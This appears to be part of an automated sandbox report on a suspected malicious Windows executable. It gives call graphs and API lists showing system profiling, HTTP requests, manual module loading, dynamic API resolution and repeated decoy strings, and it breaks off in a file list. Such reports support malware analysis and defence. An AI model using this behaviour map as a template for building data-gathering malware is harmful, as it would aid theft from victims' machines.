271f9c 15001->15002 15003 27a9b0 4 API calls 15002->15003 15004 271fc6 15003->15004 15005 27a8a0 lstrcpy 15004->15005 15006 271fcf 15005->15006 15007 27a9b0 4 API calls 15006->15007 15008 271fef 15007->15008 15009 27a8a0 lstrcpy 15008->15009 15010 271ff8 15009->15010 15634 277d80 GetSystemPowerStatus 15010->15634 15013 27a9b0 4 API calls 15014 272018 15013->15014 15015 27a8a0 lstrcpy 15014->15015 15016 272021 15015->15016 15017 27a9b0 4 API calls 15016->15017 15018 272040 15017->15018 15019 27a8a0 lstrcpy 15018->15019 15020 272049 15019->15020 15021 27a9b0 4 API calls 15020->15021 15022 27206a 15021->15022 15023 27a8a0 lstrcpy 15022->15023 15024 272073 15023->15024 15025 27207e GetCurrentProcessId 15024->15025 15636 279470 OpenProcess 15025->15636 15028 27a920 3 API calls 15029 2720a4 15028->15029 15030 27a8a0 lstrcpy 15029->15030 15031 2720ad 15030->15031 15032 27a9b0 4 API calls 15031->15032 15033 2720d7 15032->15033 15034 27a8a0 lstrcpy 15033->15034 15035 2720e0 15034->15035 15036 27a9b0 4 API calls 15035->15036 15037 272100 15036->15037 15038 27a8a0 lstrcpy 15037->15038 15039 272109 15038->15039 15641 277e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15039->15641 15042 27a9b0 4 API calls 15043 272129 15042->15043 15044 27a8a0 lstrcpy 15043->15044 15045 272132 15044->15045 15046 27a9b0 4 API calls 15045->15046 15047 272151 15046->15047 15048 27a8a0 lstrcpy 15047->15048 15049 27215a 15048->15049 15050 27a9b0 4 API calls 15049->15050 15051 27217b 15050->15051 15052 27a8a0 lstrcpy 15051->15052 15053 272184 15052->15053 15645 277f60 15053->15645 15056 27a9b0 4 API calls 15057 2721a4 15056->15057 15058 27a8a0 lstrcpy 15057->15058 15059 2721ad 15058->15059 15060 27a9b0 4 API calls 15059->15060 15061 2721cc 15060->15061 15062 27a8a0 lstrcpy 15061->15062 15063 2721d5 15062->15063 15064 27a9b0 4 API calls 15063->15064 15065 2721f6 15064->15065 15066 27a8a0 lstrcpy 15065->15066 15067 2721ff 15066->15067 15658 277ed0 GetSystemInfo wsprintfA 15067->15658 15070 27a9b0 4 API calls 15071 27221f 15070->15071 15072 27a8a0 lstrcpy 15071->15072 15073 272228 15072->15073 15074 27a9b0 4 API calls 15073->15074 15075 272247 15074->15075 15076 27a8a0 lstrcpy 15075->15076 15077 272250 15076->15077 15078 27a9b0 4 API calls 15077->15078 15079 272270 15078->15079 15080 27a8a0 lstrcpy 15079->15080 15081 272279 15080->15081 15660 278100 GetProcessHeap RtlAllocateHeap 15081->15660 15084 27a9b0 4 API calls 15085 272299 15084->15085 15086 27a8a0 lstrcpy 15085->15086 15087 2722a2 15086->15087 15088 27a9b0 4 API calls 15087->15088 15089 2722c1 15088->15089 15090 27a8a0 lstrcpy 15089->15090 15091 2722ca 15090->15091 15092 27a9b0 4 API calls 15091->15092 15093 2722eb 15092->15093 15094 27a8a0 lstrcpy 15093->15094 15095 2722f4 15094->15095 15666 2787c0 15095->15666 15098 27a920 3 API calls 15099 27231e 15098->15099 15100 27a8a0 lstrcpy 15099->15100 15101 272327 15100->15101 15102 27a9b0 4 API calls 15101->15102 15103 272351 15102->15103 15104 27a8a0 lstrcpy 15103->15104 15105 27235a 15104->15105 15106 27a9b0 4 API calls 15105->15106 15107 27237a 15106->15107 15108 27a8a0 lstrcpy 15107->15108 15109 272383 15108->15109 15110 27a9b0 4 API calls 15109->15110 15111 2723a2 15110->15111 15112 27a8a0 lstrcpy 15111->15112 15113 2723ab 15112->15113 15671 2781f0 15113->15671 15115 2723c2 15116 27a920 3 API calls 15115->15116 15117 2723d5 15116->15117 15118 27a8a0 lstrcpy 15117->15118 15119 2723de 15118->15119 15120 27a9b0 4 API calls 15119->15120 15121 27240a 15120->15121 15122 27a8a0 lstrcpy 15121->15122 15123 272413 15122->15123 15124 27a9b0 4 API calls 15123->15124 15125 272432 15124->15125 15126 27a8a0 lstrcpy 15125->15126 15127 27243b 15126->15127 15128 27a9b0 4 API calls 15127->15128 15129 27245c 15128->15129 15130 27a8a0 lstrcpy 15129->15130 15131 272465 15130->15131 15132 27a9b0 4 API calls 15131->15132 15133 272484 15132->15133 15134 27a8a0 lstrcpy 15133->15134 15135 27248d 15134->15135 15136 27a9b0 4 API calls 15135->15136 15137 2724ae 15136->15137 15138 27a8a0 lstrcpy 15137->15138 15139 2724b7 15138->15139 15679 278320 15139->15679 15141 2724d3 15142 27a920 3 API calls 15141->15142 15143 2724e6 15142->15143 15144 27a8a0 lstrcpy 15143->15144 15145 2724ef 15144->15145 15146 27a9b0 4 API calls 15145->15146 15147 272519 15146->15147 15148 27a8a0 lstrcpy 15147->15148 15149 272522 15148->15149 15150 27a9b0 4 API calls 15149->15150 15151 272543 15150->15151 15152 27a8a0 lstrcpy 15151->15152 15153 27254c 15152->15153 15154 278320 17 API calls 15153->15154 15155 272568 15154->15155 15156 27a920 3 API calls 15155->15156 15157 27257b 15156->15157 15158 27a8a0 lstrcpy 15157->15158 15159 272584 15158->15159 15160 27a9b0 4 API calls 15159->15160 15161 2725ae 15160->15161 15162 27a8a0 lstrcpy 15161->15162 15163 2725b7 15162->15163 15164 27a9b0 4 API calls 15163->15164 15165 2725d6 15164->15165 15166 27a8a0 lstrcpy 15165->15166 15167 2725df 15166->15167 15168 27a9b0 4 API calls 15167->15168 15169 272600 15168->15169 15170 27a8a0 lstrcpy 15169->15170 15171 272609 15170->15171 15715 278680 15171->15715 15173 272620 15174 27a920 3 API calls 15173->15174 15175 272633 15174->15175 15176 27a8a0 lstrcpy 15175->15176 15177 27263c 15176->15177 15178 27265a lstrlen 15177->15178 15179 27266a 15178->15179 15180 27a740 lstrcpy 15179->15180 15181 27267c 15180->15181 15182 261590 lstrcpy 15181->15182 15183 27268d 15182->15183 15725 275190 15183->15725 15185 272699 15185->13617 15913 27aad0 15186->15913 15188 265009 InternetOpenUrlA 15192 265021 15188->15192 15189 2650a0 InternetCloseHandle InternetCloseHandle 15191 2650ec 15189->15191 15190 26502a InternetReadFile 15190->15192 15191->13621 15192->15189 15192->15190 15914 2698d0 15193->15914 15195 270759 15196 27077d 15195->15196 15197 270a38 15195->15197 15199 270799 StrCmpCA 15196->15199 15198 261590 lstrcpy 15197->15198 15200 270a49 15198->15200 15201 2707a8 15199->15201 15228 270843 15199->15228 16090 270250 15200->16090 15203 27a7a0 lstrcpy 15201->15203 15205 2707c3 15203->15205 15208 261590 lstrcpy 15205->15208 15206 270865 StrCmpCA 15207 270874 15206->15207 15245 27096b 15206->15245 15209 27a740 lstrcpy 15207->15209 15210 27080c 15208->15210 15212 270881 15209->15212 15213 27a7a0 lstrcpy 15210->15213 15211 27099c StrCmpCA 15214 2709ab 15211->15214 15234 270a2d 15211->15234 15215 27a9b0 4 API calls 15212->15215 15216 270823 15213->15216 15217 261590 lstrcpy 15214->15217 15218 2708ac 15215->15218 15219 27a7a0 lstrcpy 15216->15219 15220 2709f4 15217->15220 15221 27a920 3 API calls 15218->15221 15222 27083e 15219->15222 15223 27a7a0 lstrcpy 15220->15223 15224 2708b3 15221->15224 15917 26fb00 15222->15917 15226 270a0d 15223->15226 15227 27a9b0 4 API calls 15224->15227 15229 27a7a0 lstrcpy 15226->15229 15230 2708ba 15227->15230 15228->15206 15231 270a28 15229->15231 15232 27a8a0 lstrcpy 15230->15232 16033 270030 15231->16033 15235 2708c3 15232->15235 15234->13625 15245->15211 15565 27a7a0 lstrcpy 15564->15565 15566 261683 15565->15566 15567 27a7a0 lstrcpy 15566->15567 15568 261695 15567->15568 15569 27a7a0 lstrcpy 15568->15569 15570 2616a7 15569->15570 15571 27a7a0 lstrcpy 15570->15571 15572 2615a3 15571->15572 15572->14448 15574 2647c6 15573->15574 15575 264838 lstrlen 15574->15575 15599 27aad0 15575->15599 15577 264848 InternetCrackUrlA 15578 264867 15577->15578 15578->14525 15580 27a740 lstrcpy 15579->15580 15581 278b74 15580->15581 15582 27a740 lstrcpy 15581->15582 15583 278b82 GetSystemTime 15582->15583 15584 278b99 15583->15584 15585 27a7a0 lstrcpy 15584->15585 15586 278bfc 15585->15586 15586->14540 15589 27a931 15587->15589 15588 27a988 15590 27a7a0 lstrcpy 15588->15590 15589->15588 15591 27a968 lstrcpy lstrcat 15589->15591 15592 27a994 15590->15592 15591->15588 15592->14544 15593->14658 15595 264eee 15594->15595 15596 269af9 LocalAlloc 15594->15596 15595->14546 15595->14549 15596->15595 15597 269b14 CryptStringToBinaryA 15596->15597 15597->15595 15598 269b39 LocalFree 15597->15598 15598->15595 15599->15577 15600->14668 15601->14809 15602->14811 15603->14819 15732 2777a0 15604->15732 15607 2776c6 RegOpenKeyExA 15609 2776e7 RegQueryValueExA 15607->15609 15610 277704 RegCloseKey 15607->15610 15608 271c1e 15608->14901 15609->15610 15610->15608 15612 271c99 15611->15612 15612->14915 15614 271e09 15613->15614 15614->14957 15616 271e84 15615->15616 15617 277a9a wsprintfA 15615->15617 15616->14971 15617->15616 15619 277b4d 15618->15619 15620 271efe 15618->15620 15739 278d20 LocalAlloc CharToOemW 15619->15739 15620->14985 15623 27a740 lstrcpy 15622->15623 15624 277bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15623->15624 15632 277c25 15624->15632 15625 277c46 GetLocaleInfoA 15625->15632 15626 277d18 15627 277d1e LocalFree 15626->15627 15628 277d28 15626->15628 15627->15628 15629 27a7a0 lstrcpy 15628->15629 15631 277d37 15629->15631 15630 27a9b0 lstrcpy lstrlen lstrcpy lstrcat 15630->15632 15631->14998 15632->15625 15632->15626 15632->15630 15633 27a8a0 lstrcpy 15632->15633 15633->15632 15635 272008 15634->15635 15635->15013 15637 2794b5 15636->15637 15638 279493 GetModuleFileNameExA CloseHandle 15636->15638 15639 27a740 lstrcpy 15637->15639 15638->15637 15640 272091 15639->15640 15640->15028 15642 272119 15641->15642 15643 277e68 RegQueryValueExA 15641->15643 15642->15042 15644 277e8e RegCloseKey 15643->15644 15644->15642 15646 277fb9 GetLogicalProcessorInformationEx 15645->15646 15647 277fd8 GetLastError 15646->15647 15648 278029 15646->15648 15652 277fe3 15647->15652 15656 278022 15647->15656 15651 2789f0 2 API calls 15648->15651 15655 27807b 15651->15655 15652->15646 15654 272194 15652->15654 15740 2789f0 15652->15740 15743 278a10 GetProcessHeap RtlAllocateHeap 15652->15743 15653 2789f0 2 API calls 15653->15654 15654->15056 15655->15656 15657 278084 wsprintfA 15655->15657 15656->15653 15656->15654 15657->15654 15659 27220f 15658->15659 15659->15070 15661 2789b0 15660->15661 15662 27814d GlobalMemoryStatusEx 15661->15662 15663 278163 __aulldiv 15662->15663 15664 27819b wsprintfA 15663->15664 15665 272289 15664->15665 15665->15084 15667 2787fb GetProcessHeap RtlAllocateHeap wsprintfA 15666->15667 15669 27a740 lstrcpy 15667->15669 15670 27230b 15669->15670 15670->15098 15672 27a740 lstrcpy 15671->15672 15676 278229 15672->15676 15673 278263 15675 27a7a0 lstrcpy 15673->15675 15674 27a9b0 lstrcpy lstrlen lstrcpy lstrcat 15674->15676 15677 2782dc 15675->15677 15676->15673 15676->15674 15678 27a8a0 lstrcpy 15676->15678 15677->15115 15678->15676 15680 27a740 lstrcpy 15679->15680 15681 27835c RegOpenKeyExA 15680->15681 15682 2783d0 15681->15682 15683 2783ae 15681->15683 15685 278613 RegCloseKey 15682->15685 15686 2783f8 RegEnumKeyExA 15682->15686 15684 27a7a0 lstrcpy 15683->15684 15695 2783bd 15684->15695 15687 27a7a0 lstrcpy 15685->15687 15688 27843f wsprintfA RegOpenKeyExA 15686->15688 15689 27860e 15686->15689 15687->15695 15690 278485 RegCloseKey RegCloseKey 15688->15690 15691 2784c1 RegQueryValueExA 15688->15691 15689->15685 15692 27a7a0 lstrcpy 15690->15692 15693 278601 RegCloseKey 15691->15693 15694 2784fa lstrlen 15691->15694 15692->15695 15693->15689 15694->15693 15696 278510 15694->15696 15695->15141 15697 27a9b0 4 API calls 15696->15697 15698 278527 15697->15698 15699 27a8a0 lstrcpy 15698->15699 15700 278533 15699->15700 15701 27a9b0 4 API calls 15700->15701 15702 278557 15701->15702 15703 27a8a0 lstrcpy 15702->15703 15704 278563 15703->15704 15705 27856e RegQueryValueExA 15704->15705 15705->15693 15706 2785a3 15705->15706 15707 27a9b0 4 API calls 15706->15707 15708 2785ba 15707->15708 15709 27a8a0 lstrcpy 15708->15709 15710 2785c6 15709->15710 15711 27a9b0 4 API calls 15710->15711 15712 2785ea 15711->15712 15713 27a8a0 lstrcpy 15712->15713 15714 2785f6 15713->15714 15714->15693 15716 27a740 lstrcpy 15715->15716 15717 2786bc CreateToolhelp32Snapshot Process32First 15716->15717 15718 27875d CloseHandle 15717->15718 15719 2786e8 Process32Next 15717->15719 15720 27a7a0 lstrcpy 15718->15720 15719->15718 15724 2786fd 15719->15724 15723 278776 15720->15723 15721 27a9b0 lstrcpy lstrlen lstrcpy lstrcat 15721->15724 15722 27a8a0 lstrcpy 15722->15724 15723->15173 15724->15719 15724->15721 15724->15722 15726 27a7a0 lstrcpy 15725->15726 15727 2751b5 15726->15727 15728 261590 lstrcpy 15727->15728 15729 2751c6 15728->15729 15744 265100 15729->15744 15731 2751cf 15731->15185 15735 277720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15732->15735 15734 2776b9 15734->15607 15734->15608 15736 277765 RegQueryValueExA 15735->15736 15737 277780 RegCloseKey 15735->15737 15736->15737 15738 277793 15737->15738 15738->15734 15739->15620 15741 278a0c 15740->15741 15742 2789f9 GetProcessHeap HeapFree 15740->15742 15741->15652 15742->15741 15743->15652 15745 27a7a0 lstrcpy 15744->15745 15746 265119 15745->15746 15747 2647b0 2 API calls 15746->15747 15748 265125 15747->15748 15904 278ea0 15748->15904 15750 265184 15751 265192 lstrlen 15750->15751 15752 2651a5 15751->15752 15753 278ea0 4 API calls 15752->15753 15754 2651b6 15753->15754 15755 27a740 lstrcpy 15754->15755 15756 2651c9 15755->15756 15757 27a740 lstrcpy 15756->15757 15758 2651d6 15757->15758 15759 27a740 lstrcpy 15758->15759 15760 2651e3 15759->15760 15761 27a740 lstrcpy 15760->15761 15762 2651f0 15761->15762 15763 27a740 lstrcpy 15762->15763 15764 2651fd InternetOpenA StrCmpCA 15763->15764 15765 26522f 15764->15765 15766 2658c4 InternetCloseHandle 15765->15766 15767 278b60 3 API calls 15765->15767 15773 2658d9 ctype 15766->15773 15768 26524e 15767->15768 15769 27a920 3 API calls 15768->15769 15770 265261 15769->15770 15771 27a8a0 lstrcpy 15770->15771 15772 26526a 15771->15772 15774 27a9b0 4 API calls 15772->15774 15777 27a7a0 lstrcpy 15773->15777 15775 2652ab 15774->15775 15776 27a920 3 API calls 15775->15776 15778 2652b2 15776->15778 15785 265913 15777->15785 15779 27a9b0 4 API calls 15778->15779 15780 2652b9 15779->15780 15781 27a8a0 lstrcpy 15780->15781 15782 2652c2 15781->15782 15783 27a9b0 4 API calls 15782->15783 15784 265303 15783->15784 15786 27a920 3 API calls 15784->15786 15785->15731 15787 26530a 15786->15787 15788 27a8a0 lstrcpy 15787->15788 15789 265313 15788->15789 15790 265329 InternetConnectA 15789->15790 15790->15766 15791 265359 HttpOpenRequestA 15790->15791 15793 2658b7 InternetCloseHandle 15791->15793 15794 2653b7 15791->15794 15793->15766 15795 27a9b0 4 API calls 15794->15795 15796 2653cb 15795->15796 15797 27a8a0 lstrcpy 15796->15797 15798 2653d4 15797->15798 15799 27a920 3 API calls 15798->15799 15800 2653f2 15799->15800 15801 27a8a0 lstrcpy 15800->15801 15802 2653fb 15801->15802 15803 27a9b0 4 API calls 15802->15803 15804 26541a 15803->15804 15805 27a8a0 lstrcpy 15804->15805 15806 265423 15805->15806 15807 27a9b0 4 API calls 15806->15807 15808 265444 15807->15808 15809 27a8a0 lstrcpy 15808->15809 15810 26544d 15809->15810 15811 27a9b0 4 API calls 15810->15811 15812 26546e 15811->15812 15813 27a8a0 lstrcpy 15812->15813 15905 278ead CryptBinaryToStringA 15904->15905 15907 278ea9 15904->15907 15906 278ece GetProcessHeap RtlAllocateHeap 15905->15906 15905->15907 15906->15907 15908 278ef4 ctype 15906->15908 15907->15750 15909 278f05 CryptBinaryToStringA 15908->15909 15909->15907 15913->15188 16156 269880 15914->16156 15916 2698e1 15916->15195 15918 27a740 lstrcpy 15917->15918 15919 26fb16 15918->15919 16091 27a740 lstrcpy 16090->16091 16092 270266 16091->16092 16093 278de0 2 API calls 16092->16093 16094 27027b 16093->16094 16095 27a920 3 API calls 16094->16095 16096 27028b 16095->16096 16097 27a8a0 lstrcpy 16096->16097 16098 270294 16097->16098 16099 27a9b0 4 API calls 16098->16099 16100 2702b8 16099->16100 16157 26988e 16156->16157 16160 266fb0 16157->16160 16159 2698ad ctype 16159->15916 16163 266d40 16160->16163 16164 266d63 16163->16164 16171 266d59 16163->16171 16164->16171 16177 266660 16164->16177 16166 266dbe 16166->16171 16183 2669b0 16166->16183 16168 266e2a 16169 266ee6 VirtualFree 16168->16169 16170 266ef7 16168->16170 16168->16171 16169->16170 16172 266f41 16170->16172 16173 266f26 FreeLibrary 16170->16173 16174 266f38 16170->16174 16171->16159 16172->16171 16175 2789f0 2 API calls 16172->16175 16173->16170 16176 2789f0 2 API calls 16174->16176 16175->16171 16176->16172 16178 26668f VirtualAlloc 16177->16178 16180 26673c 16178->16180 16181 266730 16178->16181 16180->16166 16181->16180 16182 266743 VirtualAlloc 16181->16182 16182->16180 16184 2669c9 16183->16184 16188 2669d5 16183->16188 16185 266a09 LoadLibraryA 16184->16185 16184->16188 16186 266a32 16185->16186 16185->16188 16192 266ae0 16186->16192 16193 278a10 GetProcessHeap RtlAllocateHeap 16186->16193 16188->16168 16189 266ba8 GetProcAddress 16189->16188 16189->16192 16190 2789f0 2 API calls 16190->16192 16191 266a8b 16191->16188 16191->16190 16192->16188 16192->16189 16193->16191

                        Executed Functions

                        Function 00279860 Relevance: 80.7, APIs: 33, Strings: 13, Instructions: 212libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 660 279860-279874 call 279750 663 279a93-279af2 LoadLibraryA * 5 660->663 664 27987a-279a8e call 279780 GetProcAddress * 21 660->664 666 279af4-279b08 GetProcAddress 663->666 667 279b0d-279b14 663->667 664->663 666->667 669 279b46-279b4d 667->669 670 279b16-279b41 GetProcAddress * 2 667->670 671 279b4f-279b63 GetProcAddress 669->671 672 279b68-279b6f 669->672 670->669 671->672 673 279b71-279b84 GetProcAddress 672->673 674 279b89-279b90 672->674 673->674 675 279b92-279bbc GetProcAddress * 2 674->675 676 279bc1-279bc2 674->676 675->676
                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,00E22338), ref: 002798A1
                        • GetProcAddress.KERNEL32(74DD0000,00E22290), ref: 002798BA
                        • GetProcAddress.KERNEL32(74DD0000,00E22278), ref: 002798D2
                        • GetProcAddress.KERNEL32(74DD0000,00E22410), ref: 002798EA
                        • GetProcAddress.KERNEL32(74DD0000,00E223E0), ref: 00279903
                        • GetProcAddress.KERNEL32(74DD0000,00E290B0), ref: 0027991B
                        • GetProcAddress.KERNEL32(74DD0000,00E155B0), ref: 00279933
                        • GetProcAddress.KERNEL32(74DD0000,00E15230), ref: 0027994C
                        • GetProcAddress.KERNEL32(74DD0000,00E221A0), ref: 00279964
                        • GetProcAddress.KERNEL32(74DD0000,00E22398), ref: 0027997C
                        • GetProcAddress.KERNEL32(74DD0000,00E22158), ref: 00279995
                        • GetProcAddress.KERNEL32(74DD0000,00E222A8), ref: 002799AD
                        • GetProcAddress.KERNEL32(74DD0000,00E152F0), ref: 002799C5
                        • GetProcAddress.KERNEL32(74DD0000,00E221B8), ref: 002799DE
                        • GetProcAddress.KERNEL32(74DD0000,00E221E8), ref: 002799F6
                        • GetProcAddress.KERNEL32(74DD0000,00E15550), ref: 00279A0E
                        • GetProcAddress.KERNEL32(74DD0000,00E22200), ref: 00279A27
                        • GetProcAddress.KERNEL32(74DD0000,00E22218), ref: 00279A3F
                        • GetProcAddress.KERNEL32(74DD0000,00E152B0), ref: 00279A57
                        • GetProcAddress.KERNEL32(74DD0000,00E22230), ref: 00279A70
                        • GetProcAddress.KERNEL32(74DD0000,00E153F0), ref: 00279A88
                        • LoadLibraryA.KERNEL32(00E22500,?,00276A00), ref: 00279A9A
                        • LoadLibraryA.KERNEL32(00E22440,?,00276A00), ref: 00279AAB
                        • LoadLibraryA.KERNEL32(00E22488,?,00276A00), ref: 00279ABD
                        • LoadLibraryA.KERNEL32(00E224D0,?,00276A00), ref: 00279ACF
                        • LoadLibraryA.KERNEL32(00E224E8,?,00276A00), ref: 00279AE0
                        • GetProcAddress.KERNEL32(75A70000,00E224B8), ref: 00279B02
                        • GetProcAddress.KERNEL32(75290000,00E22458), ref: 00279B23
                        • GetProcAddress.KERNEL32(75290000,00E224A0), ref: 00279B3B
                        • GetProcAddress.KERNEL32(75BD0000,00E22470), ref: 00279B5D
                        • GetProcAddress.KERNEL32(75450000,00E154F0), ref: 00279B7E
                        • GetProcAddress.KERNEL32(76E90000,00E29120), ref: 00279B9F
                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00279BB6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000739000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000073F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000074F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799565875.0000000000750000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799815431.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799842494.00000000008E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_260000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: 0"$0R$8#$@$$NtQueryInformationProcess$PU$X!$X$$p$$x"$!$#$$
                        • API String ID: 2238633743-1988400604
                        • Opcode ID: 808b8a673339c1917b4c01dab5eea85af28f6ff09b3ffb7afc2900ff084b35b5
                        • Instruction ID: 8955939c6e5d3fb9ecb4ddbbcee93a2ea85a8a1c6ad71ce00c6cf2e9595cb741
                        • Opcode Fuzzy Hash: 808b8a673339c1917b4c01dab5eea85af28f6ff09b3ffb7afc2900ff084b35b5
                        • Instruction Fuzzy Hash: 08A17EB9500210AFD394EFA8FD88A667FF9F75E301704853EA609C3264D7399865CF1A
                        Function 002645C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 764 2645c0-264695 RtlAllocateHeap 781 2646a0-2646a6 764->781 782 26474f-2647a9 VirtualProtect 781->782 783 2646ac-26474a 781->783 783->781
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0026460F
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0026479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002646CD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0026474F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00264622
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00264734
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002645C7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0026475A
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002645F3
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0026466D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002645E8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00264617
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00264683
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002646B7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00264657
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002645D2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002645DD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00264713
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00264765
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00264770
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00264662
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00264638
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002646AC
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00264729
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0026477B
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0026471E
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0026473F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0026462D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00264678
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00264643
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002646C2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002646D8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1798593544.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                        • Associated: 00000000.00000002.1798512937.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000311000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.000000000031D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1798593544.00000000004AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1799253602.0000000000717000.00000040.00000001.01000000.00000003.sdmpDownload File
